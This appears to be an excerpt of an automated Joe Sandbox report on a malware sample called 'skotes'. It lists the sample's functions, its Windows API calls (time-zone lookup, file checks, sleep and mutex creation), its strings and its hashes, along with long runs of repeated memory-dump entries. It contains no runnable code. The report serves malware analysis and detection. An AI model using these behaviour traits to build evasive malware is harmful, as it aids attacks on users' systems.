Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: =L-t$JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$Py
API String ID: 1721193555-3410820028
Opcode ID: 92155d5937938e938ef78e1e94ee55ac945567b3acbd8d14acf7a964f8781bcf
Instruction ID: 0d826ccb3c9144d0a580ecea1bca602a39e26976aff9ddbdd5f20676773a19d4
Opcode Fuzzy Hash: 92155d5937938e938ef78e1e94ee55ac945567b3acbd8d14acf7a964f8781bcf
Instruction Fuzzy Hash: 43E1F370E40644DBDB18BB68DC4F79D7A71AB46720FA4428CE415AB3C2DB7D4E818BD2

Function 007C26F2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 172
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,007D6758), ref: 007C275C

Strings

Eastern Summer Time, xrefs: 007C27FA
=L-t, xrefs: 007C2858
Eastern Standard Time, xrefs: 007C27CB
Xg}, xrefs: 007C2705, 007C270B

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: =L-t$Eastern Standard Time$Eastern Summer Time$Xg}
API String ID: 565725191-3469898719
Opcode ID: 8ad3a0ddf5e75971bc46214041ca4c920472dde3425f3f9a690abd126c65615d
Instruction ID: 75a91c4ddeb08ed1d588678893def4db6e993947bbaecf7148947d8e13bd8d9d
Opcode Fuzzy Hash: 8ad3a0ddf5e75971bc46214041ca4c920472dde3425f3f9a690abd126c65615d
Instruction Fuzzy Hash: C1510971900259EFDB10EF649C85FAE77FCEB54360B14416DE610A7193EB3C9E428B60

Function 007B6FB4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007B6EE6), ref: 007B6FD6
GetFileInformationByHandle.KERNELBASE(?,?), ref: 007B7030
__dosmaperr.LIBCMT ref: 007B70C5

Part of subcall function 007B732A: __dosmaperr.LIBCMT ref: 007B735F

Strings

n{, xrefs: 007B6FCE
=L-t, xrefs: 007B6FBC

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID: =L-t$n{
API String ID: 2531987475-3203586158
Opcode ID: 18e4532ea32e81020171576e68ff6d0472846cb24dd4d63cd133a20ecb79d2bf
Instruction ID: 02af4e82f0a9843940a8c15cdf97fb5cb56f3326f76a7934dd592c72365eabf8
Opcode Fuzzy Hash: 18e4532ea32e81020171576e68ff6d0472846cb24dd4d63cd133a20ecb79d2bf
Instruction Fuzzy Hash: 5E415D71904208ABDB28EFB5DC45AEFB7F9EFC8300B10482EF856D3610E6389900DB61

Function 00789BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00789BA8
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: 70e2e191bcc851a7360bd47111f51c851e71a6187fb695a19859be2d385f3028
Instruction ID: 6863838e45465f6505bc6758ffc8b2991e5c16ac744102bfc2b5fc9d8a7790a8
Opcode Fuzzy Hash: 70e2e191bcc851a7360bd47111f51c851e71a6187fb695a19859be2d385f3028
Instruction Fuzzy Hash: 82316A71784244DBEB18EB78DC8D76DBB62EB86310F24821DE1149B3D6D73E59808762

Function 00789CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00789CDD
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: 841fa23c64385589abe43c9a56b55a5d13637700f49e7b2708504a1fd3a93a8d
Instruction ID: 7ae472f0b729611f51d507137d9002e788a63f909d6a0a8e58f95a064de5b4c7
Opcode Fuzzy Hash: 841fa23c64385589abe43c9a56b55a5d13637700f49e7b2708504a1fd3a93a8d
Instruction Fuzzy Hash: 37312771744240DBEF18ABB8D8CC7ADBA62EB86310F284619E1149B3D5D73D99808766

Function 00789F44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00789F47
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: d4c0d6e4176f5859898691bc2d2dc2e1c9a677253d96bd6eb877125995981c01
Instruction ID: 66745a85dfb20836e11ae33cfa9c90b55034f41cabf9c4675f3363703c9b89ee
Opcode Fuzzy Hash: d4c0d6e4176f5859898691bc2d2dc2e1c9a677253d96bd6eb877125995981c01
Instruction Fuzzy Hash: E7311531744244EBEB1CABA8D88D7ADBA62EB85310F24421AE154DB2D5D73D59808752

Function 0078A079 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0078A07C
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
